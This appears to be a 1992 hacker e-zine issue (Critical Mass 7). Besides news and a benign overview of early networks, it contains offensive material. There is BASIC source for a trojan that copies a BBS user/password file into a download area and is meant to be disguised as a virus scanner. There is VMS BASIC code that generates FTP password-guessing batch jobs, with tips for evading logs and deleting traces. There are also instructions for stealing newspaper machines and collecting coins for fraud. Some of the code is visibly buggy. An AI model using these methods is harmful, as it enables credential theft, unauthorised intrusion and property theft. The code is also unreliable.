Copy Link
Add to Bookmark
Report
Critical Mass 7
1
"It's Alive! It's Alive!"
_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 07 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> <03/26/92>
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 7
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
Critical Mass Technical Newsletter is free to those who wish
to gain in further knowledge of topics of Telecommunications,
Datacommunications, Computer and Phone Security, Software and other
forms of piracy, explosives, and other forms of not widely known or
talked about topics.
All article are totally original, unless stated otherwise.
We will not except unoriginal, plagiarized articles, or article
that contain false information. We except articles from anyone who
is willing to follow these criteria, and as long the editors, writters
and S.A.O.O. members feel that the article is worthy to print.
We encourage all to download these files and pass them on
freely to others as long as credits of the editors, writer or
S.A.O.O. is not modified in any way.
There is no set date for release issues, but we attempt to
put them out as frequently as possible.
We now also offer BBS's outside the Tallahassee area to get
on our BBS listing. If you decide to get on this list, we will send
you issues as soon as they are produced.
If you have any questions pertaining to a article, please
leave E-Mail to the author of the article. If you cannot get in
contact with the author, please leave "The Beaver" mail at the
following BBS's, he will try to put you in touch with the author,
and/or try to answer your questions.
The Beaver
The Back Door BBS BlackHawk BBS
(904)997-6127 (904)421-9255
Warrior's Retreat Wizard Spell Book
(904)422-4606 (904)574-3447
Tower Of Power
(904)668-6745
Or, if you have access, one of the following S.A.O.O. BBS's.
Hacker Wholesale <904>PRI-VATE
Speed Shop <904>PRI-VATE
S.A.O.O. Main <904>PRI-VATE
If you wish to become a member of the S.A.O.O. please leave
The Beaver E-Mail, where he will send you an application for you to
fill out. From there, local S.A.O.O. members in your area will
consider you and take a vote on if at that date you can become a
member.
We are always looking for experienced and even
non-experienced p/hackers to join. Only after a back-ground check and
the vote, will you be let in. If you fail to get in, do not be mad,
we have turned down many people. Simply wait, improve the reasons
that you where not let in, if possible, and in the mean time, learn.
We are also looking into other remote S.A.O.O. support
boards to net with and share information with. In the event that
you would like to support a S.A.O.O. chapter in your area, please
contact a member of the Tallahassee S.A.O.O. Benefits do come.
Currently we are looking into mostly the Florida region,
from Jacksonville To Miami, but are willing to reach into other
areas.
Head Chief And Writer - The Beaver
Editor - Flea
Members - <S>ilicon <A>luminum <O>xidation <O>rganization.
This Issues Articles Include:
I. - Local News
By The Beaver.
II. - Network Discriptions
By <Unknown>
III. - Simple RA BBS User.bbs Trojan
By The Beaver
IV. - How to support yourself doing little to nothing.
By The Beaver, Shadow Hacker, D.M., Section 8, etc
V. - Beav's FTP Batch Hacking Method <For VAX/VMS>
By The Beaver
VI - The SAOO Generic Telenet Scan Part II
Scanned By The Beaver.
VII - Brief discription on really hiding directorys
By Dementia Meister
VIII - Down and dirty chemistry. Part I
By Art Phish
VIV - Closing notes.
By The Beaver
__________________________________
Local News
The Beaver
_______________________
Hello, and welcome to yet another issue of Critical Mass.
Man has it been a great year for hacking for fellow S.A.O.O.
members in this area, but we will not go into that right now........
As you might recall, in the first CM, I wrote a editorial on about
the downfall of fun and intresting BBS's that allow you to speak freely.
I am now happy to say that this is changing rather fast. I have seen more
pirate boards, both private and public, pop up in this area, that it almost
brings a tear to my eye. This raise a point.....
A new BBS echo has hit the ole town of Tallahassee. It is called
"[Unregistered] Net", and the primary topic is on Piracy, Hacking, Phreaking,
and pretty much any topics that are not talked about in the normal realm
of people. It IS however a totally legal net, so basicly this means that
there is NO stolen account's/codes/etc traded on this perticular net. If
you would like to become a part of this net, please contact 'The Beaver'
or 'Section 8' pretaining to information on the net and how to get on. There
are currently 5 boards on the net <Actually as of this writing, the net is
not up yet>, but we expect three or four more to be on in the near future.
If intrested, mail one of the above, and all information will be
sent to you. There is also the SAOO net, which will be coming into action
soon. In order to be a part of this net, one must be either a active member
of the SAOO and/or support a SAOO support BBS. Please contact one of the
above for further information.
It looks as if the ole Upper Deck will be down longer than expected.
So don't call looking for it. When it does come back up however, we will
have more storage so that we can carry more files online.
The S.A.O.O. Telenet Generic Telenet Scanner Version 1.1i Beta is
out, though this is nothing to really brag about. It works, but as stated
it is a beta version. As you may have noticed, it came with your issue of
Critical Mass#7. As of this time, you are slightly ahead of people how are
downloading version 1.0i beta off of Tallahassee BBS's, in that v1.1i beta
contains a bug fix. See the Doc's for more information! Also, feel
privileged.
Currently, there is some talk also about having a local Computer
convention of sorts. What is being looked into right now is to have a
basic get together of modem users in our area, and hopefully along with
outsiders as well. What is desired is a two day long event in which
users get together and discuss serval topics, along with speakers in all
fields, including computer security. What hopes to be arranged is a
'conference' of sorta, for speakers ranging from MircoSoft to local DEC,
FCIC, FDLE and possible FBI computer secuity officals. This is in its
very early planing stages. If you wish to help out the efforts, please
contacts your nearest S.A.O.O. member!
Welp, it looks like ole Abigail Natias is leaving the Tallahassee
area and is heading for the Ft. Walton Bch area. He has been a fellow
SAOO member since it was founded. Never fear though, he remains in the
SAOO, and hopefully, within the next few months, a new SAOO chapter will
be opening within that area.
There is a new BBS on internet that you might find intresting. It
is pretty much a underground BBS, so to obtain information on it, please
contact "The Beaver" at one of the given BBS's.
_________________________________________
Network Descriptions
By <Unknown>
___________________________
Editor Note:
This was orginally a message posted on a BBS in Ft. Walton Bch
Florida. Unfortunatly, the author is unknown to us, so we
cannot give him/her credit. Also, this text is somewhat old
so, not all the information is accurate.
- The Plethora of Networks -
Since I have been at an ARPANET site for about three years, and a USENET
site for the same amount of time, I think I can comment on some of the
Networks that exist out there. Particularly since Berkeley has become
a gateway for several of them.
ARPANET
-------
Brought to you by the fun folks at DARPA, it was one of the very first
experiments with computer networking, and certainly the first on a national
(and later international) scale. It is centrally controlled and implicitly
routed (i.e. the network figures out how to get from point a to point b).
To join, you have to have a gov't sponsor and it is for the execution of
official gov't business & research. (sure it is...)
In so far as I am aware, all links are faster than 9.6Kbaud, and a good
number of them are 56Kbaud. All appear to be dedicated. Number of sites is
somewhere between 250 and 300. If you choose to count the whole internet,
things get a little bigger. Anyone have any ideas about the number of
internet sites? Three basic services are offered by the ARPANET:
FTP - File Transfer Program (fetch/send files anywhere) telnet
Interactive access to other hosts on the network MAIL Electronic Mail
MILNET
------
Stepchild of the ARPANET (or perhaps goosestepping child?), MILNET is where
the military sites gather to do the same things ARPANET does, without
disruptions caused by networking reseach (i.e. it is a production
version of the ARPANET). It split from the ARPANET in October of 1983.
CSNET
-----
This is a network funded (initially, although they will be self-sufficient
later on) for the purpose of Computer Science Research by the National
Science Foundation (and probably many others). By self-sufficient', I mean
that the individual member sites of CSNET will pay the full cost of
central control, administration, and ARPANET access. Last price I was
quoted was $30K/year. Presently seems to be between 50-100 sites.
I'm a little shaky on what this network has in terms of services, but
here goes: Services seem to be limited to MAIL, but FTP is coming. Mail is
handled with the MMDF software, which operates over the phone. There are two
ARPANET gatways: UDEL-RELAY and RAND-RELAY. These two sites handle the
phone traffic to the rest of the net (??) from the ARPANET. Network
addressing is implicit. To get to a CSNET site from the ARPANET:
mail person.site@RAND-RELAY (or UDEL-RELAY)
BITNET
------
This is a network of IBM hosts, and seems to be built along the same lines
as the ARPANET (implicit addressing, dedicated lines, central control) but
not all the sites have the same capabilites. Services supported: MAIL,
and FTP (for those sites that have RSCS). Presently is about 50-60 sites.
Founded by CUNY, after they got IBM to cough up the software that is used in
the IBM internal VNET. I have no idea how fast it goes. Scope: national. To
address someone on the BITNET from the ARPANET:
mail person%site.BITNET@BERKELEY
BERKELEY's mailer converts this to
G:SITE=PERSON
and it gets sent to UNIX G (in the UCB Computer Center), which in turn sends
it to the IBM 4341 (UCBVMA on the BITNET), and from there it goes where
it's supposed to...
DEC Engineering NET (E-NET)
---------------------------
This is DEC's internal network of engineering machines (now you know
where VMS comes from!). It is centrally controlled, semi-implicitly
routed (they are converting from an explicit routing scheme) and is
composed of somewhere between 2000 and 2100 sites. Primary service seems to
be MAIL, but there is no doubt some form of FTP as well. Speed seems to be
somewhere in the higher ranges (4800+ baud), but I infer this from speed of
mail propagation alone. This network is international in scope, with
several European sites. For ARPAnauts, you can mail to the E-NET:
mail decwrl!rhea!site!person@BERKELEY
The site decwrl' talks to ucbvax' with UUCP. ucbvax' is the ARPANET site
BERKELEY. The mailer at decwrl converts address syntax to
RHEA::SITE::PERSON
and away it goes...
There is a DEC site on the ARPANET (DEC-MARLBORO) which appears to do
gatewaying duty now and again, but by hand only. This would be an ideal
point to establish a real gateway (hint, hint...)
(and now, for the grand finale...;drum roll please=)
UUCP/USENET (ta da!)
--------------------
These two networks are forever intertwined, and from the ARPANET
point of view, there is little difference between the two. By the
nature of the beast they must be discussed together. UUCP is an acronym
for Unix-to-Unix Copy, a file transfer and remote execution facility which
operates over a direct line (max 9600baud) or over the phone lines
(typically 1200 baud).
Mail is transmitted through the network on a pass it on basis, and at
present, only the mail software knows how to transfer stuff beyond a site's
immediate neighbors. The UUCP network exists because some of my neighbors
talk to some of your neighbors, so through them we can send mail to each
other. The network has no central control, and no one knows how many
sites there are, or how far the network extends. Anyone can join the
network, all it takes is a UNIX system, and another site willing to
talk to you. After four months of traffic analysis, I have found just
over 2000 UUCP sites.
USENET is a subset of the UUCP network. On top of the existing UUCP
software, sites in this network run netnews', which is a bboard system,
also on a pass it on basis. Imagine a bboard system in which you post
something, and you pass it on to the other USENET sites you talk to (and so
on, and so on, ad nausem), until the whole network has seen the item you
posted. The discussions are separated by topic, and if you thought that the
ARPANET had a wide range mailing lists, the USENET has currently
somewhere between 150-200 active network wide newsgroups discussing
things as esoteric as UNIX bugs to mundane things like cooking. There are
approximately 600 USENET sites covering the continental US, Canada,
Europe, and Australia. There is a USENET directory kept by Karen
Summers-Horton (cbosgd!map@BERKELEY), and it is posted monthly on the first
of the month to net.news.map.
The anarchy of the network is interesting. Among other things, it
means that you must have an educated network community (ever try to educate
people at 600 sites??) and punitive actions are very nearly impossible on
a unilateral scale. It makes path routing difficult, however. The
directory includes information about links that a particular site has, but
it is up to the site to provide and maintain that information. Since the
network is in a constant state of flux, it is very hard to map the whole
thing. Unlike the ARPANET, usually the best you can do is get a snapshot.
(finis)
Now. Where I err, please correct me. Most of the networks mentioned get
HUMAN-NETS in one form or another, so I expect that corrections will filter
in over the next few days. However, on the whole, I don't think I have missed
anything major.
For the networkingly confused, I hope I have been of some help. This got
just a touch longer than I had anticipated.
A bit more info on Digital's ENET
First I'd like to thank the author of the compendium on networks.
And second, I'd like to give a little more information on the Digital ENET.
It is composed of systems running our DECNET software products, first
introduced about nine years ago.
DECNET is much more than a mail network. It is a product built on a
layered network architecture (DNA) with lower, non-programmer accessible
data-link and routing layers, and higher, programmer accessible, session
layers.
It is similar to the ISO model on open systems interconnect. Since it is
older than that model, it does not correspond exactly, but will, more and
more, as time goes by and as the worldwide networks develop.
At the data-link level it can use synchronous or asynchronous lines of
any speed running DDCMP, public network lines running X.25, parallel
links running protocols specific to those devices, and Ethernet. Using
gateway products it can create gateway links into an IBM SNA network.
At the user accessible layer, it is possible for any program to open a
transparent, full-duplex, channel to any other program on the same or any
other node in the network. Programmers can take advantage of this "network
logical link" to build any application they wish.
Various Digital supported protocols running on logical links are
host-to-host terminal connections, allowing a user at any node to act as
an interactive terminal on any other node, Mail, the Data Access Protocol,
(see next paragraph) and several others.
The DAP protocol is used to copy files, but it is much more than a file
copy protocol. It permits a program on any system to access a file on any
other system as though that file were a local file. In fact, VMS and RSX
using the DAP routines buried in RMS permit a nodename to be simply a part
of a file spec used by any program.
DECNET does a bit more than implicit routing; it does dynamic path routing.
As a result, given sufficient alternate paths, the loss of an
intermediate node does not affect the operation of traffic currently routing
through that node. Dynamic path routing was first made available in
DECNET Phase III, offered for sale almost five years ago.
For example, since our network has three transatlantic links, a few
months ago, we had a serious failure of the links between Massachusetts and
the remainder of our engineering and marketing headquarters 30 miles to the
north in New Hampshire. But due to the fact that some of our transatlantic
links go into New Hampshire and others into Maynard, we did not immediately
notice the problem. Things got a bit slower, since we were no longer using
several 56Kbps links but were pushing all traffic through some 9600bps links
to the U.K., down to Geneva, and back. The reason there occasionally appears
to be some implicit routing in our node strings is that the Phase III
version of DECNET had a maximum of 256 addresses. This restriction has been
lifted in Phase IV. However, as a result of the restriction, it was
necessary for us to partition our network.
Reassigning node numbers will not be complete for several months, and not
all systems will upgrade, so there may be a few systems which require one
intermediate hop from RHEA. Many of these will have definitions on RHEA
making that transparent to the sender (though a recipient would see the
hop). The rest should be directly addressable from RHEA, whether located
in the U.S., Canada, the Caribbean, Europe (13 countries now), the Middle
East, the Far East, or Australia. (Remember, IBM is the only computer
manufacturer larger than Digital.)
Compliments to Mr. Fair - an excellent summary article. Would that Human-Nets
had more such.
To expand on CSNET: It is currently funded by the NSF, and expects to
become self-supporting during the next few years, based on member fees. These
fees are:
$ 30,000 - commercial sites
$ 10,000 - government and not-for-profit
$ 5,000 - educational
These fees may be reduced by petitioning for a reduction in the
case of small outfits, and are lower for people who already have a net
connection via Arpanet.
The CSNET membership list as of Dec. 1
shows:
85 Phonenet sites
6 Telenet sites
18 Arpanet sites
4 CSNET-owned hosts
Not all of these sites are operational yet, though most are. Phonenet sites
are served by two Relay machines, which call them up nightly to exchange
mail. Text files may be automatically transferred using MMDF-based
mail-receipt programs, though this is obviously not the best way to do
business. Bandwidth here is limited by the 1200-baud phone lines as well as
by the capacities of the Relays. Mailing-list stuff can be handled OK,
but Usenet traffic breaks the Relays by sheer load.
Telenet sites run TCP/IP on top of X.25 virtual circuits, using software
developed for CSNET at Purdue. Personally I think this is hot stuff.
If your phone bills are $1500/month, you can run equivalent traffic over
Telenet for about $1200/month, last time we figured it out. And, you get
full Internet connectivity and services into the bargain. Because the
drop lines from Telenet to the host are really only 9600, 4800, or 1200
baud dedicated phone lines, instantaneous bandwidth is not as good
as Arpanet, but it's not bad. And, you and the rest of the world will be
hard-put to tell that you're not on Arpanet directly, except you don't
have to deal with the DoD. This software really works, and works well.
Arpanet sites run standard Arpanet software - no change.
In addition to simple net connectivity, CSNET brings the
benefits of centralized network management. Basically this means that
if your mail isn't moving, you have experts to scream to, and they really
will work hard to fix the problem. There are other benefits such as
ongoing mail system development, an automatic nameserver, and so forth.
Management of CSNET has recently been transferred away from the contractor
committees which built the net to a newly-formed Executive Committee,
which is overseeing the move from a research to a service organization.
The two relay machines are moving to BBN - it's cheaper and easier to run a
single computer center and communicate via WATS lines than to spread out the
Relay operations.
Just to clarify something... DECNET is the name of a product sold by Digital
which any customer can use to build their own network.
DECNET is used to build Digital's internal network. The internal network
name has been a hotly debated subject (what's in a name?) but the most
commonly used name is the ENET, since the largest internal use was within
Engineering.
Now the whole company is being interconnected, and Engineering
Network is not really an appropriate name. But the E in ENET doesn't
necessarily have to stand for Engineering.
We think it can stand for Everthing, Employee, Everywhere, or whatever
anyone wants it to stand for.
The lack of any serious central control (other than a nodename
registry) makes things like this not really matter.
Here's a network you left out: the XEROX Internet. Most outsiders tend to
overlook the XEROX Internet, for various reasons:
1) only a small proportion of the traffic is gatewayed to or from other
networks;
2) what little gatewaying there is gets done almost invisibly;
3) the name difficulty. (I'm told that XEROX used "Internet" first, but that
doesn't matter much now.)
The XEROX Internet only has about 2000 users, but it is widely distributed,
with users in Europe and Japan.
The mail transport mechanism within the XEROX Internet is called
Grapevine. Grapevine addresses look like "<user>.<registry>". If the
registry you're sending to is the one you are in, you can leave it off, and
the address becomes merely "<user>". Registries are geographic - the two
largest are "PA" (Palo Alto), for Northern California, and "ES" (El
Segundo), for Southern California.
To send mail in from the ARPAnet, the address looks like:
"<user>.<registry>@PARC-MAXC".
If the registry is PA, you can leave it off, giving "<user>@PARC-MAXC".
This is what I mean by invisible gatewaying - to outsiders, it looks
like all 2000 of us Xeroids receive our mail on poor little PARC-MAXC. Not
so - it's just a gateway. I think the source of the confusion is that people
are used to explicitly specifying a host for the mail to be delivered to,
as well as a user on that host. Grapevine's mail servers are politely
invisible.
Sending mail out to the ARPAnet is as easy as pi. "ARPA" is just another
registry, so I just say "<user>@<host>.ARPA". Or if I'm really
lazy, I can just say "<user>@<host>", since anything with at atsign
automatically goes to the ARPAnet.
In addition to the networks previously described, there are five public data
networks actively serving the US and more in the works. The five national
PDNs are all common carriers, like Greyhound - that is, anybody whos pays
the fare can use them. They all provide an X.25 interface, which gives
a virtual circuit service - there is as yet no international standard for
mail or FTP. All provide a virtual terminal capability via the X.3/X.29
PAD standards. They all compete vigorously for business, and I'm sure
I'll hear about it immediately if I have left out anybody's capability.
Here (in alphabetical order) are the five established PDNs:
ADP Autonet
175 Jackson Plaza
Ann Arbor, MI 48106
(313) 769-6800
Besides the US, has satellite links to London, England and Delft, The
Netherlands. Maximum internal speed is 9600 bps. Nodes are PDP-11s with
KMC-11 front end microprocessors. Internal protocol was described to me
as derivative of the old ARPAnet protocols.
CompuServe Incorporated
Network Services Division
5000 Arlington Centre Blvd.
P.O. Box 12
Columbus, OH 43220
(614) 457-8600
Internal speeds to 56k bps. Nodes are PDP-11s with 6809 microprocessor front
ends. Internal protocol is DDCMP.
GTE Telenet Communications Corp.
8229 Boone Boulevard
Vienna, VA 22180
(703) 442-1000
Internal speeds to 56k bps. Nodes are arrays of 6502s in a redundant, load
sharing configuration. Internal protocol conforms to CCITT
Recommendation X.75. Supports automatic recovery of virtual circuit
when a node fails during a call. Built by some of the folks from BBN who
built the ARPAnet originally. Provides a mail service called Telemail.
Tymnet, Inc.
2710 Orchard Parkway
San Jose, CA 95134
(408) 946-4900
Internal speeds to 56k bps. Nodes are arrays of "Tymnet Engines" in a
redundant, load sharing configuration. The Tymnet Engine is a Tymnet-built
32-bit processor derived from the Interdata 732, re-engineered for
extremely high MTBF. Internal protocol is a unique Tymnet design which
repacketizes inside the network and does flow control at the byte level,
like TCP. Supports automatic recovery of virtual circuit when a node fails
during a call. Provides a mail service called OnTyme.
Uninet
United Telecom Communications, Inc.
2525 Washington
Kansas City, MO 64108
(816) 221-2444
Internal speeds to 56k bps. Nodes are Modcomp 7830s. Internal protocol is a
Uninet-designed virtual circuit protocol, on top of HDLC.
In addition there is, of course, the new AT&T offering, NET/1000. Nodes
consist of arrays of VAXen with a Series/I for line handling. They see
the function of their network as storing information, rather than just
forwarding it like the other networks. The internal protocol is X.25, but
they don't support an X.25 user interface! (No, I don't know why). For
further information, call Mr. John M. Finn, their San Francisco account
executive at (415) 452-7292.
Graphic Scanning and Computer Sciences Corp. are in the process of spinning
off their internal networks, as GraphNet and InfoNet respectively I
believe. There will probably be X.25 interfaces, if they don't exist
already.
GE Information Services Company has an internal network called MARK*NET.
There is not as yet an X.25 interface to it.
And, how could I forget, the State of Utah boasts its own Public Data
Network! It is called ComWest and is being spun off by Blue Cross/Blue
Shield of Utah, which needed a good way to get claims data from places
like Panguitch, Utah up to Salt Lake City. The internal circuits are leased
from Mountain Bell (no, they're not barbed wire, skeptics) and run up to
9600 bps. Nodes are Dynatech Packet Technology Multi-Switch.25 packet
switches, which are based on the Z80 micro. There are several sites besides
BC/BS, one of them being the University of Utah DECSYSTEM-20.
Outside the US, there are public data networks operating in about forty
foreign countries, basically the ones that are industrialized. We have a
user who logs in regularly from Stockholm via the Swedish PDN <->
Telenet <-> ComWest. He says he gets good response.
_______________________________________
The Simple RA User.BBS Trojan.
By The Beaver
_____________________________
Member S.A.O.O. <Silicon Aluminim Oxidation Organization>
The entire idea behind the code is simple. To get the User.BBS file,
which contains all the user's and there passwords <Along with other intresting
facts>. It is currently set for RA, but can probably be modified for Qbbs, or
what not.... Here is the little "ho-down" on the program and it's steps.
1> Find RA's User.bbs file, using the program "dirscan.com"
Once found, store the path.
2> Find a file that you are SURE is in a files transfer area. Take for
instance, if you know that there is a file in the Utilities area
called "bigdeal.zip", and you want the User.BBS file to go in
that directory, we search for "bigdeal.zip", and store the path
it came from.
3> copy the User.BBS to the file transfer area as something non-
suspision. So if it copys, as in our example, to the utility
directory, make it something like, "list.com" it is copied.
<NOTE: Make sure that the "utility" does NOT actually exsist!>
4> Call everyday and do a "raw directory" and look for the file.
Since the files.bbs is not modifed, it will not be seen on a
normal file list, so a raw is required. If raw-directory is not
supported, then simply go on everyday and try to download
the name it is stored under. In our case, "list.com". If it is
there, whether or not it is in a standard file list, it can be down-
loaded.
The "diskscan" program is nothing more than a utility like, "where".
Basicly all it does it find files for you. This should not be a
very hard utility to find.
Once you obtain the user file, you should have no problem with a
text editor going though and determining what the username and
passwords are, along with other information.
If you are of thoughs neat types, you can get RA or the utility
"rauser.exe" and rename your physdo utility back to "users.bbs" and
with a few little modification, you can use the utility that looks
though that and gathers the fields. Anyrate, I hope you enjoy this,
but it real was not that hard to do.
Actually, Dementia Meister is writting a better version of this
in pascal, but I am sure you can figure it out and convert it to
whatever laugage you so desire.
Also, I would like to note the fact that this is not
a very easy bug to cure, and I see no what for sysops
to protect themselve from the use of this method, other
than having a careful eye. <At least not right off ayway>.
Member S.A.O.O. < Leave mail on membership >
< Only the worthy hack's >
< need apply! >
---==<Beaver>==---
' This is version 1.0 of the RA user.bbs trojan horse.
' Object.... To find users.bbs and copy it to a download
' area, so that it maybe download, thus all usernames and passwords
' are obtained.
'
' This program uses "dirscan.com" file finder.
'
' Written By The Beaver
SHELL "dirscan users.bbs >me" ' Find User.bbs with full path
' and put it in a file called
' "me".
OPEN "me" FOR INPUT AS #1
INPUT #1, userbbs$ ' Grab Path out of the file.
CLOSE #1 ' okay, we are done.
KILL "me" ' kill the "diskscan" output file
SHELL "dirscan (filename) >me" ' Now find the file transfer area.
' we search for a file we KNOW is
' there.
' Replace the (filename) with a
' file that you know is in the
' download directory
OPEN "me" FOR INPUT AS #1 ' Grab path out of file again.
INPUT #1, filetrans$ ' Okay, got it!
CLOSE #1
KILL "me" ' kill the "diskscan" output file
FOR i = LEN(filetrans$) TO 1 STEP -1
IF MID$(filetrans$, i, 1) = "\" THEN a = i: GOTO step2
NEXT i
step2:
filepath$ = LEFT$(filetrans$, a) ' okay, we got the file area
' path we need. Now do the
' dirty deed.
SHELL "copy " + userbbs$ + " " + filepath$ + "neatgame.exe >me"
KILL "me" ' the ">me" keeps output from going to the screen
' <the "1 file copied" message>. All output to
' con. is redirected to a file. We are killing this
' file
' Also, make the "neatgame.exe" to what ever file
' you desire to call it.
' From this code, I advise a few things. This is only raw source.
' Add in a few nifty things, so it appears as a virus scanner or
' maybe a disk doctor or something. Just add in print statements
' here and there. Plus, as some sort of disk utility, all the hard
' disk access can be explained!
_______________________________________________________________
How to support yourself doing little, or nothing
at all.
By Bored SAOO Members Late One Night
___________________________________________
Here we will discuss the infamous "Democrate Fraud"
method.
I take no resposiblity for any prosecutions, damages,
injuries, etc. Attempt at your own risk...
Though, this method has never been tested, along with myself
and five fellow SAOO members thought of this while sitting
around a dead Democat Paper Dispenser. Simply follow the
following steps....
1> Getting the Machine
Get you hands on a Democat Paper Machine. To do this, take
three of your fellow comrades in one vechicle, with a
large back seat/trunk <A Van is ideal> and approach
a nice, lonely paper machine. Get two people to grab it
while one watchs out. If the machine is bolted down,
use bolt cutters.
2> Opening it
Cut the lock off that secures the brace pin <Located
near the top on the right hand side on most machines>.
Remove the brace pin and "open de hatch". Remove the
money. Replace the lock <that secures the brace pin>
and secure with new lock.
* NOTE: Do not beat it open! It will only serve as a
nice plant stand, or as it was at Abigail's house,
"That thing in the corner."
3> Re-distribution of wealth
There is still more money to be made. Now, take the
paper machine <Now with YOUR lock on it> and drop it
off in a somewhat populated area. Not in a place so
populated that the real paper men will see it, but
in a back area <I.E. - By a pool near apartments,
in a laundry room in apartments>. In other words,
where the real paper man won't see it.
Now, every morning goto a paper stand <A legit stand that
is!> and put in your 50 cent <$1.50 on Sundays!> and
remove ALL the papers.
Now return to YOUR paper stand and put in all the papers
you just got into your paper machine with your lock on
it!
Now, every night, return and unlock your paper stand and
collect your money! Repeat this process and distribute
your stands around as much as possible. Start this entire
process over again....
4> Closing notes.....
Though past experiences of certain members of the SAOO
<Shadow Hacker, Abigail, and Dementia Meister>, they
got a whole $5.00 on a stolen machine <That they beat
open, because of lack of bolts cutters>. The machine
they got was in a area not to populated.
We estimate that a real popular area, you could maybe
get out of one box $15 dollars. This is a problem,
the paper people already got boxes there. We figure that
a box in a more ideal area for you will probably will
average $7.50 on weekdays.
Sudays are another story. You might make a possible
$20 dollars for that day. So for one box, in a decent
location, adverage is......
Week : $65.00
Month : $260.00
Year : $3120.00
With this in effect, lets say you can operate 5 Boxes
max, safely and effectively. Lets average that....
Week : $325.00
Month : $1300.00
Year : $15,600.00
Which is, of course, tax free. This should be efficent
to keep up with most of your bills and whatnot. With a
real job, you could make real money! Or, if you are
unlike me, collect welfair and live like a king! Welp
there you go!
<P.S. - Don't take this text TO literally!>
---==<Beaver>==---
Idea conceived by SAOO members - The Beaver, Shadow Hacker,
Abigail, Dementia Meister and Section 8.
Thought up just before before getting rid of a beat up
box and hacking on machines at Utaha and Miami Fl.
<July 24, 1992>
______________________________________________________________
The VAX/VMS FTP Batch Hack.
Written By The Beaver
________________________________________________
When I came up with this method about a year and a half ago, I never
knew how good it would work out for me. I have cracked more accounts using
this method than I can possibly think of. In order to use this method, one
must of some sort of programming knowlege and understand, at least somewhat,
how VMS works.
First off, let me briefly explain the method before we actually go
into coding or anything like that. FTP <File Transfer Protocal> is used as
a file transfer method from one machine to another. What really makes this
great is that any machine that supports FTP can be hacked using this method.
This means that you can use you hacked VMS system to hack any other
system that supports FTP that runs any OS! Heres how the idea came to me. One
night, I was hacking on a VMS system somewhere on the Internet, and I
remembered that everytime you fail a account, the user is notified that there
was a invald login attempt, and if you have to many invalid attempts in a
given time, bells and whistles go off, telling the operator that a "breakin"
is in progress. This can be a real bummer.
Well I got to thinking that this "front door" hacking was really becoming
a drag, then it dawned on me. No logs or records of invalid attempts are
recorded <At least to my knowlege> by FTP, which you have to "login" to send
files to the remote machines! Now I'm set. I'm hacking like hell, the another
idea "spawn's" on me.
What if I upload a ton of commonly used passwords, write a program that
will create a batch job that will attempt all the passwords on the accounts
that I was hacking. Then I could "submit it" and let it hack for me? Trust
me, it worked like a dream.
From that, I came up with tons of variations of the program. Well,
lets get started with the technical info.
All the code was written under VMS BASIC, because everybody and there
grandmothers <The ones who hack> knows BASIC. The first example it a hack
over internet on a single account with a password list.
<Title: One User, Multiple Passwords>
5 on error goto 50 ! This will Catch EOF
10 user$="bob" ! This is ther username
open "passwords.dat" for input as#2 ! Open File w/ Favorite Passwds
open "hack.bat" for output as#1 ! Our Batch That Will Hack.
10 input#2, pass$ ! Grab A Password
20 print#1,"$ ftp <Target Address> /user="+username$+" /pass="+pass$
30 print#2,"quit" ! Where Tried Our Password, Now Quit.
40 goto 20 ! Do It All Over Again.
50 resume 51
51 close#1 ! Got The EOF, now close
close#2 ! up and exit.
end
That simple. We now have a file called "hack.bat", which will do our
hacking for us. Ok, so we are ready to kick it off. Type the following.
Submit hack.bat /noprint / notify
Now, let me explain a little more. In line 20, where we FTP to the
desired address, you must keep the "$" in there. If it is removed, the
Batch job will not work correctly. This tell the VAX that this is a DCL
level command, so it must stay. There is none in front of the "quit", because
by then, we are not at DCL, but rather, we are using the FTP program.
Heres something very important to remember also. When you "submit"
the batch job, make sure the "/noprint" is present! This tells the system
NOT to dump batch information to the printer. If you don't do this, everyone
in the computer center will see what you are up to! That ain't cool!
The "/notify" is optional. This will simply tell you when your
batch job has completed.
Now, while its doing its thing, go off and do something else for
a while <I.E. Setup another one, eat, sleep for a change>. Okay, the batch
job completes, now you want to extract all the cool information. You will
notice that there is a big, fat log called "hack.log". This is a record
of everything that happened in our batch job. Now we check to see if we
got in or not. This part you might have to play with. I use the VMS "search"
command at this point, like thus........
Search hack.log logged
This will search the entire log for the work "logged". So if it finds
one, it will display the line that had that word. What we are looking for is
the nice key words "logged in". From here it will dump to you whether you
suceeded in logging in or not. One problem, it will only show that line, so
you might have to whip-up another BASIC program that will search for all the
important lines that contain the information you want <I.E. - THE PASSWORD!>.
There ya have it! Possible hours of work all nicely automatied for ya!
The only problem? There will be a FTP logged stored in the targets directory.
No big deal, you have there password, go over and delete it.
The following is more code, with a brief discription of what it does.
All "submits" should be done like before.
<Title: The Gobber Scan>
5 on error goto 100 ! Catch That Thare EOF
10 open "usernames" for input as#1 ! Open A List Of Usernames
open "hack.bat" for output as#2 ! Opens Our Work Horse
20 input#1,user$ ! Get a Username
30 print#2,"$ ftp <Target Address> /user="+user$+" /pass="+user$
40 print#2,"quit" ! Try Then Quit FTP
50 goto 20
100 resume 111
111 close#1 ! Got The EOF, Now
112 close#2 ! Close Up The Files
113 end
This is the one I find that is most successful! It trys the persons
username as a password. This works real nice on VAX/VMS systems, because
VMS accounts usually default there passwords to the username! In one case,
